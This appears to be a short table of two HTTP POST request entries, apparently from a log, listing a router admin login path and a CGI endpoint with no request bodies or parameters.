1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
2 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |